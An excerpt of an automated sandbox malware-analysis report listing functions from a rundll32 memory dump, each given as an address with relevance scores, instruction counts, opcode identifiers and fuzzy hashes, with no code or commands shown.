                                                                                                                                                                                                                                          Function 05045F48 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRdq
                                                                                                                                                                                                                                          • API String ID: 0-3106745678
                                                                                                                                                                                                                                          • Opcode ID: e05058dcc5aef650117b76656b99022fa45e76d29229b3a7731e1289206ebc41
                                                                                                                                                                                                                                          • Instruction ID: 4ef10e256fffe702f006d5255b62136751e91d63bb6cf9c7e4f1505a15836126
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e05058dcc5aef650117b76656b99022fa45e76d29229b3a7731e1289206ebc41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1216F70B001189FDB089B69D459AAEBBF6FB88610F108029E902AB390DF759C01CFA5
                                                                                                                                                                                                                                          Function 05045F47 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRdq
                                                                                                                                                                                                                                          • API String ID: 0-3106745678
                                                                                                                                                                                                                                          • Opcode ID: 97cabd3bd3a8ee163035a9cb8f1993ac2fd84b3482aee144272fa5d0e937dfb0
                                                                                                                                                                                                                                          • Instruction ID: 0c722a0a619c05a55c1081d9c3b5fac4feab83ed914a7c92481f97c57c598f13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97cabd3bd3a8ee163035a9cb8f1993ac2fd84b3482aee144272fa5d0e937dfb0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33218E70B001189FDB089F69D459AAE7BF6EB88610F108029E902EB3A0DF755D018FA5
                                                                                                                                                                                                                                          Function 05043370 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fiq
                                                                                                                                                                                                                                          • API String ID: 0-1578194676
                                                                                                                                                                                                                                          • Opcode ID: d421b484bd59c5c1be896fa76bbabc559e660eb755a7c823ae94f66b8b74dabb
                                                                                                                                                                                                                                          • Instruction ID: 62e5c039b5d4980a5998aae674caf2c12ecf03d095d96c4c024c87af42408946
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d421b484bd59c5c1be896fa76bbabc559e660eb755a7c823ae94f66b8b74dabb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD118275B001195FCB089FB5A4449FE7BABFBD8750B108029FA09D7244DA389E028B91
                                                                                                                                                                                                                                          Function 05043380 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fiq
                                                                                                                                                                                                                                          • API String ID: 0-1578194676
                                                                                                                                                                                                                                          • Opcode ID: d32876068af330d59d2b322a28e1403a5bd09ad14d3478fcc49811ee6f0b9121
                                                                                                                                                                                                                                          • Instruction ID: 6355e7e56e04be639449f859069452510b4a2678743c5678f56a4c78d05dd4eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32876068af330d59d2b322a28e1403a5bd09ad14d3478fcc49811ee6f0b9121
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5115275F002196FDB089FB5A8449BF7AABFBD8650B008029F909D7344DA389D028BA1
                                                                                                                                                                                                                                          Function 050457B8 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 3ecfdbbed2289060ecb1d8113c2ba4a34b8b52fd1c2f4a6fb92f67c57c90c734
                                                                                                                                                                                                                                          • Instruction ID: bc9141934e1da4d602c7f952feebe16add336fcfa83b1d62f7ea40660e2cc131
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ecfdbbed2289060ecb1d8113c2ba4a34b8b52fd1c2f4a6fb92f67c57c90c734
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501D4743082404FD715AB39E85496E3BD7EFC921071848B9D149CB351DE29EC068761
                                                                                                                                                                                                                                          Function 0504EA75 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: T;Dp
                                                                                                                                                                                                                                          • API String ID: 0-2298853029
                                                                                                                                                                                                                                          • Opcode ID: 530feff649ea00ee4715897484c87bf5c3a4a9733edb8c822723f75dfba8a198
                                                                                                                                                                                                                                          • Instruction ID: 0d4670382d431768c14b9dca8e9a1163e9fb32c2d8025fd61011676303cb5d07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 530feff649ea00ee4715897484c87bf5c3a4a9733edb8c822723f75dfba8a198
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0BB3630D2501FC705566D68918AFBBBBFBC99203650267E405C7352CC59AC0647B6
                                                                                                                                                                                                                                          Function 050499A8 Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d5ce1ead615c2ac3a209f61e9196fa71f7e4c87256675257bb165ea8335e54fc
                                                                                                                                                                                                                                          • Instruction ID: e9bb425d137385f611520d07908693a6f1f10cbd0d2c80a7c1a49f0bba8974e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ce1ead615c2ac3a209f61e9196fa71f7e4c87256675257bb165ea8335e54fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED15A74A003598FCB45CFA8D988A9DBBF2FF89300F1485A5D809AB265DB74ED45CF90
                                                                                                                                                                                                                                          Function 0504BE40 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e5980ef827399f3524d699561c47f577fb6dca76a4b157f056b7885afef92b41
                                                                                                                                                                                                                                          • Instruction ID: 2332c140646dac8fa4befe0a765664be0006ca8df4e0035c1c987603abb446ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5980ef827399f3524d699561c47f577fb6dca76a4b157f056b7885afef92b41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0B19CB4B002158FDB55DF38D58496EBBF2FF89201B148969E80A8B365DB34EC46CF90
                                                                                                                                                                                                                                          Function 0504BE33 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 832732f3787c07912c63eb3c7abce484e7b08a8055c8446f95b95cca5439bed2
                                                                                                                                                                                                                                          • Instruction ID: cea1334c06102b692b1552fd7f86a553725ff828c472611d241ee134447e727c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832732f3787c07912c63eb3c7abce484e7b08a8055c8446f95b95cca5439bed2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E715EB47002158FCB15DF38D5949AEFBF2FF89200B148A6AD84A8B355DB74E846CF91
                                                                                                                                                                                                                                          Function 0504ABA0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca88aa7a7be34acada34f226d6929452d18ec889c42a706b20a774194d9273af
                                                                                                                                                                                                                                          • Instruction ID: 322cee4aa2732b15e260252d9bfd95afa02935db1c5615602769269af080f36e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca88aa7a7be34acada34f226d6929452d18ec889c42a706b20a774194d9273af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E5105B47845118FDB89DF29E99892E77EBBF8961172984B9E007CB375DA31DC018F40
                                                                                                                                                                                                                                          Function 0504BE30 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eb2b7ed4d74a41e1294ca51fdb5bc52209a6d8bac954aa5d719c1d4e3b3f8375
                                                                                                                                                                                                                                          • Instruction ID: da45538e898fdb634f3e04970558299f561450401b8a2915ecc5e717a7ca2311
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb2b7ed4d74a41e1294ca51fdb5bc52209a6d8bac954aa5d719c1d4e3b3f8375
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55616BB4B002158FCB05DF38D5949AEFBF2FF89200B148A69D90A8B355DB34E846CF90
                                                                                                                                                                                                                                          Function 050460D9 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 613889e731e7bf37c6294ae88f6768f019bfce86164f07feb50a487b66d733d4
                                                                                                                                                                                                                                          • Instruction ID: 172ec963c8699223b4e81baccce0f817ad3c48e39e61cbc2e253932c7757322d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 613889e731e7bf37c6294ae88f6768f019bfce86164f07feb50a487b66d733d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD51E7B5A00218AFDB04DBE8C8607DEBFB6EF98301F10402AD616777A0DF356D459B62
                                                                                                                                                                                                                                          Function 05045482 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6b7a057c877c00e5993a1f5aa0e86863b131e786065adae7366606f1ef03064c
                                                                                                                                                                                                                                          • Instruction ID: 44438e108298005d684380abd2ce2e66c940449d9067654e129f6a75231e86f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b7a057c877c00e5993a1f5aa0e86863b131e786065adae7366606f1ef03064c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A514DB0E00229AFDB05EBA4E954AEEBBB2FF88301F104429D61567790CF392D51CF65
                                                                                                                                                                                                                                          Function 050434A8 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab5fa522cc4742b852a190299b72bdaeb787f3dea039b212252789f3a63e7445
                                                                                                                                                                                                                                          • Instruction ID: 41939dcca7f58e60c725f7050bb889345a73a7fd957bc72239d1eaead822be38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab5fa522cc4742b852a190299b72bdaeb787f3dea039b212252789f3a63e7445
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7951D7B07002256FCB45DB38E55096DB7E7FFC42057008A39D5099B758EF74AD4A8BD0
                                                                                                                                                                                                                                          Function 0504B4F7 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0b2eab460b508a49987767d7d758ae2f8e3fd8e1e5efcfcf8017690386a7b889
                                                                                                                                                                                                                                          • Instruction ID: 1e6ea8340a56b8f11343f4327ff5bae9e1f8f61ed233ae9cf559e745c3953c81
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b2eab460b508a49987767d7d758ae2f8e3fd8e1e5efcfcf8017690386a7b889
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2341AC7190E3E15FDB139B38A8605EA3FB1EF43211B0944E7D580CF1A3DA289949C7A6
                                                                                                                                                                                                                                          Function 050434B8 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 78933e684cea38543f2be8f92a2c65977aaca8d6d1693f47cc83b0a6bb01b9dd
                                                                                                                                                                                                                                          • Instruction ID: 044b9e1cdd63c2760a46be97faff8a00010d5bea428ea3fce309e7b0acb74c0a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78933e684cea38543f2be8f92a2c65977aaca8d6d1693f47cc83b0a6bb01b9dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A25195B0B002169FCB44DB38E55096DB7E7FFD42057009A29D509AB758EF74AD468BD0
                                                                                                                                                                                                                                          Function 05045490 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cb20407136ed6646502350d92a86d94ba227d884294f0084e380a00b7e11fd93
                                                                                                                                                                                                                                          • Instruction ID: 7c52e7b17c61d0049c5e7b575a9358a8f4a3c6f9188f012cd13b3c9fbdcdb908
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb20407136ed6646502350d92a86d94ba227d884294f0084e380a00b7e11fd93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4514BB0E00219AFDB05EBA4D954AAEBBB2FF88301F204429D61577390CF392D51DF65
                                                                                                                                                                                                                                          Function 0504C9A8 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: faf27f1023300c1c2e0d140178e8e19cf940e13e8ddfc2689579c134063bd8da
                                                                                                                                                                                                                                          • Instruction ID: b0fe747ede3a3f5753106e64441c6b51c79b8853e171739ec40a487a0212bd79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faf27f1023300c1c2e0d140178e8e19cf940e13e8ddfc2689579c134063bd8da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB31509691F3E11FE703A73868700EA3FA1AE5352970A45D7D0C5CE0A3D5098A5DC7AB
                                                                                                                                                                                                                                          Function 0504E1E0 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0c04832eb5a3c3a89374e84004ecb1bc644bf02d730f4e1ff25ac1f1872f42ac
                                                                                                                                                                                                                                          • Instruction ID: 49c117b50a1176434078eceab5faaf4d6f8927fa598d6061eec2db3750e0c0be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c04832eb5a3c3a89374e84004ecb1bc644bf02d730f4e1ff25ac1f1872f42ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64415975E012599FCB15CFA8D58499EBBF6FF89310F248169E802AB364DB30AD46CB50
                                                                                                                                                                                                                                          Function 0504D281 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 489b8e525743af9a5ba6c9def1bdd54e5d73e3a98834dc4e94724c5989cd444e
                                                                                                                                                                                                                                          • Instruction ID: c593f4beeb43c38befb0309890dc0911cc3bbbdd49517fae859b3306237e4fe0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 489b8e525743af9a5ba6c9def1bdd54e5d73e3a98834dc4e94724c5989cd444e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0541A3B26002089FD761EB60E844BFF77F6FB90341F10492ED51697190EBB4A98ACF91
                                                                                                                                                                                                                                          Function 05046720 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 455907e4b597c95132f2aaa8b5276cb1ab4872697a024c672c2767d5a50a7570
                                                                                                                                                                                                                                          • Instruction ID: 50b6349c01d8dba67c7857c958ccdc7ff8dcf4bf42d45859b8fb5df29616fc7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 455907e4b597c95132f2aaa8b5276cb1ab4872697a024c672c2767d5a50a7570
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E441E3B0A00204EFCB00DF68E64499EBBF6FF8A211B508579D519AB745EB35BD44CF91
                                                                                                                                                                                                                                          Function 0504F699 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2851f08d893816862cb2bc0d3d0e07489da3b24145fdb0161133c2464cd2f7b3
                                                                                                                                                                                                                                          • Instruction ID: fe69517ffa5b1198c324c47536660dfaecf89df29978747d774c23228d189c38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2851f08d893816862cb2bc0d3d0e07489da3b24145fdb0161133c2464cd2f7b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B41CE707042658FCB15DB38D8889BEBBF6EF99201B04456AE046C73A6DA34ED05CBA0
                                                                                                                                                                                                                                          Function 05042268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 87d0c55c417fef90251a5fdbcd67c64139215a0fb90bbd53ae3cc72bb17099a2
                                                                                                                                                                                                                                          • Instruction ID: fde78b8e17a84b4460f6aeb5f04eb5e33b4717421360d952050ac0db82024d69
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87d0c55c417fef90251a5fdbcd67c64139215a0fb90bbd53ae3cc72bb17099a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81411775B002089FCB54DF68E88499EBBF6FF88610B108169E905EB324DB31DD42CF90
                                                                                                                                                                                                                                          Function 0504D290 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 905b570a6300a1dbe9abc94b7c6e929b7b8130cee0835c2d0fa4487e994e3fbf
                                                                                                                                                                                                                                          • Instruction ID: 46927e3c76f6271d131fabaeb7b6078c98d7fa2c29ac93528b183002c749f51b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 905b570a6300a1dbe9abc94b7c6e929b7b8130cee0835c2d0fa4487e994e3fbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B04182B26002099FD760EB64E444BFFB3F6FB90352F10492ED51657190DBB4A98ACF91
                                                                                                                                                                                                                                          Function 0504F6A8 Relevance: .1, Instructions: 103COMMON
